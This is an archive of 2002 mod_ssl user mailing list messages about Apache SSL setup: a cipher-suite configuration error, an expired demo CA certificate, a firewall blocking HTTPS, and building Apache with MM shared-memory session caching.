Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Oct  7 17:03:50 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA13071; Mon, 7 Oct 2002 17:02:40 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from fsjrez04.irr.rl.af.mil id RAA13047; Mon, 7 Oct 2002 17:01:03 +0200 (MET DST)
Received: by FSJREZ04.irr.rl.af.mil with Internet Mail Service (5.5.2653.19)
	id <4GX0QFV0>; Mon, 7 Oct 2002 15:00:59 -0000
Message-ID: 
From: Zandi Patrick S TSgt AFRL/IFOSS 
To: "'modssl-users@modssl.org'" 
Subject: RE: SSLCipherSuite ALL   error
Date: Mon, 7 Oct 2002 15:00:57 -0000 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Zandi Patrick S TSgt AFRL/IFOSS 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

OK, I think I narrowed this part down..
I am getting this on make certificate...
Verify: matching certificate signature
../conf/ssl.crt/server.crt: /C=XY/ST=Snake Desert/L=Snake Town/O=Snake Oil,
Ltd/OU=Certificate Authority/CN=Snake Oil CA/Email=ca@snakeoil.dom
error 10 at 1 depth lookup:certificate has expired

Anyone ?

-----Original Message-----
From: Zandi Patrick S TSgt AFRL/IFOSS 
Sent: Monday, October 07, 2002 9:39 AM
To: 'modssl-users@modssl.org'
Subject: SSLCipherSuite ALL error


Hello , again.. I hate to be a pain here
With ./apachectl startssl 
I am getting......
"../conf/httpd.conf" 1234 lines, 44355 characters 
109 /apache/bin > ./apachectl startssl
Syntax error on line 1085 of /apache/conf/httpd.conf:
Invalid command 'SSLCipherSuite', perhaps mis-spelled or defined by a module
not included in the server configuration ./apachectl startssl: httpd could
not be started

////Line 1085  says ///
1085  SSLCipherSuite
ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+SSLv2:+EXP:+eNULL
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Oct  7 17:04:32 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA13086; Mon, 7 Oct 2002 17:03:16 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from mail.merritech.com id RAA13057; Mon, 7 Oct 2002 17:01:36 +0200 (MET DST)
Received: from unknown(200.0.0.115) by mail.merritech.com via csmap 
	 id 25239; Mon, 07 Oct 2002 10:59:43 -0400 (EDT)
Received: from Spooler by merritech (Mercury/32 v3.32) ID MO000008;
  7 Oct 02 11:01:25 -0400
Received: from spooler by merritech.com (Mercury/32 v3.32); 7 Oct 02 11:01:19 -0400
From: "Jeff Umstead" 
Organization: Merritech
To: modssl-users@modssl.org
Date: Mon, 07 Oct 2002 11:01:01 -0400
MIME-Version: 1.0
Subject: RE: SSL Not Working from Outside LAN
Message-ID: <3DA1696C.7331.8CC8A6@localhost>
In-reply-to: <9B66BBD37D5DD411B8CE00508B69700F033F2162@pborolocal.rnib.org.uk>
X-mailer: Pegasus Mail for Windows (v4.02a)
Content-type: text/plain
Content-transfer-encoding: 7BIT
Content-description: Mail message body
X-NAIMIME-Disclaimer: 1
X-NAIMIME-Modified: 1
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jeff Umstead" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

John,

I think that was it.  I had cleared the ipchains list stopped and restarted it.  Even though 
it said accept all for input, output and forward it was still stopping it.  So I stopped 
ipchains from running at start up for all levels restarted the Linux box and it now works!

Thanks for the help

--
Jeff Umstead
IS Director
Merrill Tool Holding Company
Saginaw MI USA


On 7 Oct 2002 John.Airey@rnib.org.uk wrote: 


> Have you also ran "ipchains -L" to see what you get? You may well have set
> up a firewall that prevents packets coming in.
> 
> If you get this: "ipchains: Incompatible with this kernel", then you don't
> have a firewall on the server. If you get anything else, it could be
> stopping packets coming in.
> 
> - 
> John Airey, BSc (Jt Hons), CNA, RHCE
> Internet systems support officer, ITCSD, Royal National Institute of the
> Blind,
> Bakewell Road, Peterborough PE2 6XU,
> Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 
> 
> Theories of evolution are like buses - there'll be another one along in a
> minute
> 
> 
> > -----Original Message-----
> > From: Jeff Umstead [mailto:jumstead@merritech.com]
> > Sent: 06 October 2002 16:03
> > To: modssl-users@modssl.org
> > Subject: Re: SSL Not Working from Outside LAN
> > 
> > 
> > Good idea!  I'll have to wait until tomorrow to try that.  
> > 
> > I did however do some packet sniffing and noticed that tcp packets 
> > from outside the firewall do get to the web server and the web 
> > server returns tcp packets.  But never returns any SSL ( actually 
> > SSLv2 protocol I think) packets.  Watching the packets for http the 
> > tcp and http packets pass back and forth.
> > 
> > Thanks
> > --
> > Jeff Umstead
> > IS Director
> > Merrill Tool Holding Company
> > Saginaw MI USA
> > 
> > 
> > On 6 Oct 2002 at 10:10, Jeffrey Burgoyne wrote:
> > 
> > > 
> > > How about a simple test to ensure it is not the firewall. Set apache
> > > to listen to HTTPS across port 80, which you already know works
> > > outside the firewall. Then you can easily test to ensure it is not 
> > the
> > > firewall.
> > > 
> > > Jeff
> > > 
> > > 
> > > On Sun, 6 Oct 2002, Jeff Umstead wrote:
> > > 
> > > > I've recently added a Red Hat 7.3 Linux server to our network
> > > > running Apache and mod_ssl.  My problem is I can't make an 
> > https
> > > > (over standard port 443) connection from outside our network.  
> > I can
> > > > connect via http (port 80) from both inside and outside our LAN.  
> > > > 
> > > > I have the necessary port pass throughs, firewall rules etc in 
> > place
> > > > for both ports.  It works perfectly from inside our lan 
> > (subnet) to
> > > > either http or https but not from our other sites (different
> > > > subnets) or from the internet.
> > > > 
> > > > I believe the problem is either an incorrect setting in httpd.conf
> > > > or perhaps in a network configuration file I've overlooked.  Or 
> > ???
> > > > 
> > > > Any help / tips  would be greatly appreciated.
> > > > 
> > 



This e-mail (and attachment(s)) has been virus scanned by
McAfee WebShield.

This message is intended only for use of the individual or
entity to whom it is addressed, and may contain information
that is privileged, confidential and exempt from disclosure
under applicable law.  If the reader of this message is not
the intended recipient, or the employee or agent
responsible for delivering the message to the intended
recipient, you are hereby notified that any unauthorized
use, dissemination, distribution or copying of this e-mail
or attachments, in whole or in part is strictly prohibited
and may be unlawful.  If you have received this message in
error, please inform the sender by replying to this message
and then delete the message and any attachments from your
system and destroy all copies. Thank You


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Oct  7 17:22:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA14106; Mon, 7 Oct 2002 17:21:21 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from tcen-ul-mailsv00.telkom.co.za id RAA14097; Mon, 7 Oct 2002 17:20:46 +0200 (MET DST)
Received: from CNTRRA20-GTW01.telkom.co.za (CNTRRA20-GTW01.telkom.co.za [165.143.130.156])
	by tcen-ul-mailsv00.telkom.co.za (8.11.2/8.11.2/2002061301) with SMTP id g97FKea32140
	for ; Mon, 7 Oct 2002 17:20:40 +0200
Received: FROM CNTRRA20-XS00.telkom.co.za BY CNTRRA20-GTW01.telkom.co.za ; Mon Oct 07 17:20:39 2002 +0200
Received: from CNTRRA20-XS11.telkom.co.za ([165.143.131.216]) by CNTRRA20-XS00.telkom.co.za with Microsoft SMTPSVC(5.0.2195.5329);
	 Mon, 7 Oct 2002 17:20:39 +0200
Received: from TYGRRA01-XS11.telkom.co.za ([165.148.21.97]) by CNTRRA20-XS11.telkom.co.za with Microsoft SMTPSVC(5.0.2195.5329);
	 Mon, 7 Oct 2002 17:20:38 +0200
Received: from TYGRRA01-XCS00.telkom.co.za ([165.148.21.86]) by TYGRRA01-XS11.telkom.co.za with Microsoft SMTPSVC(5.0.2195.5329);
	 Mon, 7 Oct 2002 17:20:38 +0200
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Subject: RE: SSLCipherSuite ALL   error
Date: Mon, 7 Oct 2002 17:20:37 +0200
Message-ID: 
Thread-Topic: SSLCipherSuite ALL   error
Thread-Index: AcJuEu0teA14i8plQpW/nmpivuvHAQAAYd8Q
From: "Jose Correia (J)" 
To: 
X-OriginalArrivalTime: 07 Oct 2002 15:20:38.0492 (UTC) FILETIME=[1759B9C0:01C26E15]
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id RAA14101
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jose Correia (J)" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

It looks like the default CA certificate that comes with openssl has
expired...

The solution to this is to generate your own CA and then generate and
sign your server certificate using this own CA.

If you have perl in your machine, try this url (although its meant for
FreeBSD, it works just as well on Linux):

http://www.freebsddiary.org/openssl-client-authentication.php

Just follow the part until he generates the server certificate and
insert this and the CA on  httpd.conf. The second part he's actually
admited to me is not the client certificate he was mentioning, but
rather the server certificate.

Regards
Jose



-----Original Message-----
From: Zandi Patrick S TSgt AFRL/IFOSS [mailto:Patrick.Zandi@rl.af.mil]
Sent: 07 October 2002 17:01
To: 'modssl-users@modssl.org'
Subject: RE: SSLCipherSuite ALL error


OK, I think I narrowed this part down..
I am getting this on make certificate...
Verify: matching certificate signature
../conf/ssl.crt/server.crt: /C=XY/ST=Snake Desert/L=Snake Town/O=Snake
Oil,
Ltd/OU=Certificate Authority/CN=Snake Oil CA/Email=ca@snakeoil.dom
error 10 at 1 depth lookup:certificate has expired

Anyone ?

-----Original Message-----
From: Zandi Patrick S TSgt AFRL/IFOSS 
Sent: Monday, October 07, 2002 9:39 AM
To: 'modssl-users@modssl.org'
Subject: SSLCipherSuite ALL error


Hello , again.. I hate to be a pain here
With ./apachectl startssl 
I am getting......
"../conf/httpd.conf" 1234 lines, 44355 characters 
109 /apache/bin > ./apachectl startssl
Syntax error on line 1085 of /apache/conf/httpd.conf:
Invalid command 'SSLCipherSuite', perhaps mis-spelled or defined by a
module
not included in the server configuration ./apachectl startssl: httpd
could
not be started

////Line 1085  says ///
1085  SSLCipherSuite
ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+SSLv2:+EXP:+eNULL
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Oct  7 17:35:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA14597; Mon, 7 Oct 2002 17:34:34 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from maggotts.rnib.org.uk id RAA14575; Mon, 7 Oct 2002 17:34:05 +0200 (MET DST)
From: John.Airey@rnib.org.uk
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.145])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id g97FXgs31279
	for ; Mon, 7 Oct 2002 16:33:48 +0100
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21)
	id <4FXK1WZ2>; Mon, 7 Oct 2002 16:33:37 +0100
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F033F2172@pborolocal.rnib.org.uk>
To: modssl-users@modssl.org
Subject: RE: SSL Not Working from Outside LAN
Date: Mon, 7 Oct 2002 16:33:33 +0100 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Great. "chkconfig ipchains off" should stop it running in all runlevels.

John

> -----Original Message-----
> From: Jeff Umstead [mailto:jumstead@merritech.com]
> Sent: 07 October 2002 16:01
> To: modssl-users@modssl.org
> Subject: RE: SSL Not Working from Outside LAN
> 
> 
> John,
> 
> I think that was it.  I had cleared the ipchains list stopped 
> and restarted it.  Even though 
> it said accept all for input, output and forward it was still 
> stopping it.  So I stopped 
> ipchains from running at start up for all levels restarted 
> the Linux box and it now works!
> 
> Thanks for the help
> 
> --
> Jeff Umstead
> IS Director
> Merrill Tool Holding Company
> Saginaw MI USA
> 
> 
> On 7 Oct 2002 John.Airey@rnib.org.uk wrote: 
> 
> 
> > Have you also ran "ipchains -L" to see what you get? You 
> may well have set
> > up a firewall that prevents packets coming in.
> > 
> > If you get this: "ipchains: Incompatible with this kernel", 
> then you don't
> > have a firewall on the server. If you get anything else, it could be
> > stopping packets coming in.
> > 
> > - 
> > John Airey, BSc (Jt Hons), CNA, RHCE
> > Internet systems support officer, ITCSD, Royal National 
> Institute of the
> > Blind,
> > Bakewell Road, Peterborough PE2 6XU,
> > Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 
> John.Airey@rnib.org.uk 
> > 
> > Theories of evolution are like buses - there'll be another 
> one along in a
> > minute
> > 
> > 
> > > -----Original Message-----
> > > From: Jeff Umstead [mailto:jumstead@merritech.com]
> > > Sent: 06 October 2002 16:03
> > > To: modssl-users@modssl.org
> > > Subject: Re: SSL Not Working from Outside LAN
> > > 
> > > 
> > > Good idea!  I'll have to wait until tomorrow to try that.  
> > > 
> > > I did however do some packet sniffing and noticed that 
> tcp packets 
> > > from outside the firewall do get to the web server and the web 
> > > server returns tcp packets.  But never returns any SSL ( actually 
> > > SSLv2 protocol I think) packets.  Watching the packets 
> for http the 
> > > tcp and http packets pass back and forth.
> > > 
> > > Thanks
> > > --
> > > Jeff Umstead
> > > IS Director
> > > Merrill Tool Holding Company
> > > Saginaw MI USA
> > > 
> > > 
> > > On 6 Oct 2002 at 10:10, Jeffrey Burgoyne wrote:
> > > 
> > > > 
> > > > How about a simple test to ensure it is not the 
> firewall. Set apache
> > > > to listen to HTTPS across port 80, which you already know works
> > > > outside the firewall. Then you can easily test to 
> ensure it is not 
> > > the
> > > > firewall.
> > > > 
> > > > Jeff
> > > > 
> > > > 
> > > > On Sun, 6 Oct 2002, Jeff Umstead wrote:
> > > > 
> > > > > I've recently added a Red Hat 7.3 Linux server to our network
> > > > > running Apache and mod_ssl.  My problem is I can't make an 
> > > https
> > > > > (over standard port 443) connection from outside our 
> network.  
> > > I can
> > > > > connect via http (port 80) from both inside and 
> outside our LAN.  
> > > > > 
> > > > > I have the necessary port pass throughs, firewall 
> rules etc in 
> > > place
> > > > > for both ports.  It works perfectly from inside our lan 
> > > (subnet) to
> > > > > either http or https but not from our other sites (different
> > > > > subnets) or from the internet.
> > > > > 
> > > > > I believe the problem is either an incorrect setting 
> in httpd.conf
> > > > > or perhaps in a network configuration file I've 
> overlooked.  Or 
> > > ???
> > > > > 
> > > > > Any help / tips  would be greatly appreciated.
> > > > > 
> > > 
> 
> 
> 
> This e-mail (and attachment(s)) has been virus scanned by
> McAfee WebShield.
> 
> This message is intended only for use of the individual or
> entity to whom it is addressed, and may contain information
> that is privileged, confidential and exempt from disclosure
> under applicable law.  If the reader of this message is not
> the intended recipient, or the employee or agent
> responsible for delivering the message to the intended
> recipient, you are hereby notified that any unauthorized
> use, dissemination, distribution or copying of this e-mail
> or attachments, in whole or in part is strictly prohibited
> and may be unlawful.  If you have received this message in
> error, please inform the sender by replying to this message
> and then delete the message and any attachments from your
> system and destroy all copies. Thank You
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct  9 08:18:16 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id IAA24399; Wed, 9 Oct 2002 08:17:31 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from tonnant.cnchost.com id IAA24381; Wed, 9 Oct 2002 08:16:33 +0200 (MET DST)
Received: from LAP012 (adsl-64-171-24-81.dsl.sntc01.pacbell.net [64.171.24.81])
	by tonnant.cnchost.com
	id BAA05176; Wed, 9 Oct 2002 01:08:47 -0400 (EDT)
	[ConcentricHost SMTP Relay 1.14]
From: "Gilles Gros" 
To: 
Subject: httpd.conf with mod_ssl and MM
Date: Tue, 8 Oct 2002 22:08:41 -0700
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0001_01C26F17.42EBB630"
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0)
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Gilles Gros" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0001_01C26F17.42EBB630
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Hi,

Having just heard about MM, I am trying to use it.

I compile my apache, but when I try to start it, I get :


Syntax error on line 59 of /opt/apache/conf/local_conf/mod_ssl.conf:
SSLSessionCache: shared memory cache not useable on this platform


and line 59 there is :=20
SSLSessionCache         shmcb:/usr/local/apache/logs/ssl_scache(512000)

How can I take advantage of shmcb and shmct as SSLSessionCache methods.

Thanks.

Gilles=20






------=_NextPart_000_0001_01C26F17.42EBB630
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable







Hi,


 


Having just=20
heard about MM, I am trying to use it.


 


I compile my=20
apache, but when I try to start it, I get :


 


 


Syntax=20
error on line 59 of=20
/opt/apache/conf/local_conf/mod_ssl.conf:
SSLSessionCache: shared =
memory=20
cache not useable on this platform


 


 


and line 59 there is : 


SSLSessionCache     &=
nbsp;  =20
shmcb:/usr/local/apache/logs/ssl_scache(512000)


 


How =
can I take=20
advantage of shmcb and shmct as=20
SSLSessionCache methods.


 


Thanks.


 


Gilles =







 


 


------=_NextPart_000_0001_01C26F17.42EBB630--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct  9 08:29:32 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id IAA25013; Wed, 9 Oct 2002 08:28:32 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from SOTTMXS01.entrust.com id IAA25001; Wed, 9 Oct 2002 08:27:50 +0200 (MET DST)
Received: by SOTTMXS01.entrust.com with Internet Mail Service (5.5.2656.59)
	id <42FXS0VL>; Tue, 8 Oct 2002 13:02:22 -0400
Message-ID: 
From: Robert Lagana 
To: "'modssl-users@modssl.org'" 
Subject: Site for modssl.org
Date: Tue, 8 Oct 2002 13:02:18 -0400 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2656.59)
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C26EEC.75CAD700"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Robert Lagana 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_001_01C26EEC.75CAD700
Content-Type: text/plain


Hi,

I can't hit http://www.modssl.org

I'm in need of the latest rpm or tarball for linux 7.2

Does anyone have another site I could use to download?

Thanks,
Rob

------_=_NextPart_001_01C26EEC.75CAD700
Content-Type: text/html






Site for modssl.org






Hi,




I can't hit http://www.modssl.org




I'm in need of the latest rpm or tarball for linux 7.2




Does anyone have another site I could use to download?




Thanks,

Rob





------_=_NextPart_001_01C26EEC.75CAD700--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct  9 09:19:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA27831; Wed, 9 Oct 2002 09:18:26 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from qeo02001.t-online.net id JAA27781; Wed, 9 Oct 2002 09:17:18 +0200 (MET DST)
Received: from qeo09161.de.t-online.corp (qeo09161 [192.168.248.161])
	by qeo02001.t-online.net (8.9.3/8.9.3/Debian 8.9.3-21) with ESMTP id JAA02931;
	Wed, 9 Oct 2002 09:17:08 +0200
X-Authentication-Warning: qeo02001.t-online.net: Host qeo09161 [192.168.248.161] claimed to be qeo09161.de.t-online.corp
Received: from qeo00200.de.t-online.corp ([192.168.195.200]) by qeo09161.de.t-online.corp with Microsoft SMTPSVC(5.0.2195.5329);
	 Wed, 9 Oct 2002 09:17:08 +0200
X-MimeOLE: Produced By Microsoft Exchange V6.0.6334.0
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C26F63.E087968D"
Subject: RE: httpd.conf with mod_ssl and MM
Date: Wed, 9 Oct 2002 09:17:07 +0200
Message-ID: <60F1F87A64834D45A1EBAE9618305FB86ECDE1@qeo00200>
Thread-Topic: httpd.conf with mod_ssl and MM
Thread-Index: AcJvW/K9WxPhwLAeSMqCW7kstIqSpgAA+0jw
From: "Courtin Bert" 
To: 
Cc: 
X-OriginalArrivalTime: 09 Oct 2002 07:17:08.0403 (UTC) FILETIME=[E0D0F030:01C26F63]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Courtin Bert" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01C26F63.E087968D
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Hi Gilles,
=20
1) Put all the necessary sources to a dir below e.g. SOURCES. Make sure =
you use the latest ones available as recently some mayor security fixes =
had been done.
=20
All the following works fine on solaris 8 with a gcc
=20
-> SOURCES/apache-1.3.27
-> SOURCES/mm-1.2.1
-> SOURCES/mod_ssl-2.8.11-1.3.27
-> SOURCES/openssl-0.9.6.g
=20
=20
2) Assume the following set up for some variables=20
=20
COMPILER=3D"gcc"                                  # Specify the compiler =
to use
TARGET_DIR=3D"opt"                                # This is where the =
*compiled* sources will be installed
SOURCES_SUBDIR=3D"SOURCES"          # To this subdir the zipped sources =
will be unzipped and untared
APACHE_DIR=3D"apache-1.3.27"               # Now we're defining the =
names of the subdirectories for the program sources
MM_DIR=3D"mm-1.2.1"                              # Most arcives will be =
extracted to a subdirname related to the arcive
OPENSSL_DIR=3D"openssl-0.9.6g"             # filename but e.g. =
"c-client.tar.Z will be extracted to "imap-2001a"
MODSSL_DIR=3D"mod_ssl-2.8.11-1.3.27"    # will be detected automatically =
below based on the info you state here.

=20
2) Compile MM
=20
mm has to be configured someting like this (on solaris using gcc):
=20
./configure --prefix=3D/${TARGET_DIR}/${MM} \
        --with-gcc \
        --disable-shared=20
=20
maybe you'll also specify (but not nec needed)

        --enable-batch \
        --with-shm=3DIPCSHM
=20
=20
After this, you may need to do=20

LD_LIBRARY_PATH=3D/${TARGET_DIR}/${MM}/lib:/${TARGET_DIR}/${MM}/bin:$LD_L=
IBRARY_PATH
export LD_LIBRARY_PATH

=20
=20
2) Comile openssl
In the openssl-dir do=20
=20
./config --prefix=3D/${TARGET_DIR}/${OPENSSL} -fPIC shared
=20
After making openssl do
=20
export SSL_BASE=3D/${TARGET_DIR}/${OPENSSL}
LD_LIBRARY_PATH=3D/${TARGET_DIR}/${OPENSSL}/lib:/${TARGET_DIR}/${OPENSSL}=
/bin::$LD_LIBRARY_PATH
export LD_LIBRARY_PATH

=20
3)  Apply mod_ssl to apache source tree

Changing to SUBDIR where you keep your sources for mod_ssl

Do=20
=20
CC=3D${COMPILER} \
CPFLAGS=3D"-I/${TARGET_DIR}/${OPENSSL}/include" \
CFLAGS=3D"`../${MM}/mm-config --cflags`" \
LDFLAGS=3D"-L/${TARGET_DIR}/${OPENSSL}/lib `../${MM}/mm-config =
--ldflags`" \
LIBS=3D"-lm `../${MM}/mm-config --libs`" \
EAPI_MM=3D"../${MM}"
./configure --prefix=3D/${TARGET_DIR}/${APACHE} \
            --enable-rule=3DEAPI \
            --with-apache=3D../${APACHE} \
            --with-ssl=3D../${OPENSSL} \
            --with-mm=3D../${MM} \
            --disable-rule=3DSSL_COMPAT \
            --enable-module=3Dssl=20
=20
=20
4) For the configuration of Apache you'll need to specify:
=20
If you do not need to specifiy anything else, change to apaches source =
dir and type 'make', in any other case do change to apaches source dir =
and do=20
=20
CC=3D"${COMPILER}" \
EAPI_MM=3D"../${MM}" \
CPFLAGS=3D"-I/${TARGET_DIR}/${OPENSSL}/include" \
CFLAGS=3D"`../${MM}/mm-config --cflags`" \
LDFLAGS=3D"-L/${TARGET_DIR}/${OPENSSL}/lib `../${MM}/mm-config =
--ldflags`" \
LIBS=3D"`../${MM}/mm-config --libs`" \
INCLUDE=3D"-I/${TARGET_DIR}/${OPENSSL}/include =
-I/${TARGET_DIR}/${MM}/include" \
./configure --prefix=3D/${TARGET_DIR}/${APACHE} \
            --enable-rule=3DEAPI \
            --enable-module=3Dssl \
            --add more options if needed
=20
=20
This should make shared mem available for apache/mod_ssl.=20
=20
BTW: Which platform are you using?
=20
Hope this helps - good luck
=20
=20
Kind regards,
Bert Courtin
=20


-----Original Message-----
From: Gilles Gros [mailto:gillesg@whitepj.com]
Sent: Wednesday, October 09, 2002 7:09 AM
To: modssl-users@modssl.org
Subject: httpd.conf with mod_ssl and MM


Hi,
=20
Having just heard about MM, I am trying to use it.
=20
I compile my apache, but when I try to start it, I get :
=20
=20
Syntax error on line 59 of /opt/apache/conf/local_conf/mod_ssl.conf:
SSLSessionCache: shared memory cache not useable on this platform
=20
=20
and line 59 there is :=20
SSLSessionCache         shmcb:/usr/local/apache/logs/ssl_scache(512000)
=20
How can I take advantage of shmcb and shmct as SSLSessionCache methods.
=20
Thanks.
=20
Gilles=20



=20
=20


------_=_NextPart_001_01C26F63.E087968D
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable









Hi=20
Gilles,


 


1) Put=20
all the necessary sources to a dir below e.g. SOURCES. Make sure you use =
the=20
latest ones available as recently some mayor security fixes had been=20
done.


 


All=20
the following works fine on solaris 8 with a gcc


 


->=20
SOURCES/apache-1.3.27


->=20
SOURCES/mm-1.2.1




->=20
SOURCES/mod_ssl-2.8.11-1.3.27




->=20
SOURCES/openssl-0.9.6.g


 


 


2)=20
Assume the following set up for some variables 


 


COMPILER=3D"gcc"        =
            &=
nbsp;           &n=
bsp;=20
# Specify the compiler to use


TARGET_DIR=3D"opt"       &nbs=
p;            =
;          =20
 # This is where the *compiled* sources will be=20
installed
SOURCES_SUBDIR=3D"SOURCES"      &n=
bsp; =20
 # To this subdir the zipped sources will be unzipped and=20
untared


APACHE_DIR=3D"apache-1.3.27"      =
       =20
 # Now we're defining the names of the subdirectories for the =
program=20
sources
MM_DIR=3D"mm-1.2.1"       &=
nbsp;           &n=
bsp;      =20
   # Most arcives will be extracted to a subdirname related to =
the=20
arcive
OPENSSL_DIR=3D"openssl-0.9.6g"     &nb=
sp;     =20
 # filename but e.g. "c-client.tar.Z will be extracted to=20
"imap-2001a"
MODSSL_DIR=3D"mod_ssl-2.8.11-1.3.27"    # =
will be=20
detected automatically below based on the info you state=20
here.


 


2)=20
Compile MM


 


mm has=20
to be configured someting like this (on solaris using =
gcc):


 


./configure --prefix=3D/${TARGET_DIR}/${MM}=20
\
        --with-gcc=20
\
        --disable-shared=20



 


maybe=20
you'll also specify (but not nec needed)



        --enable-batch=20
\
        =
--with-shm=3DIPCSHM


 


 


After this, you may need to do =




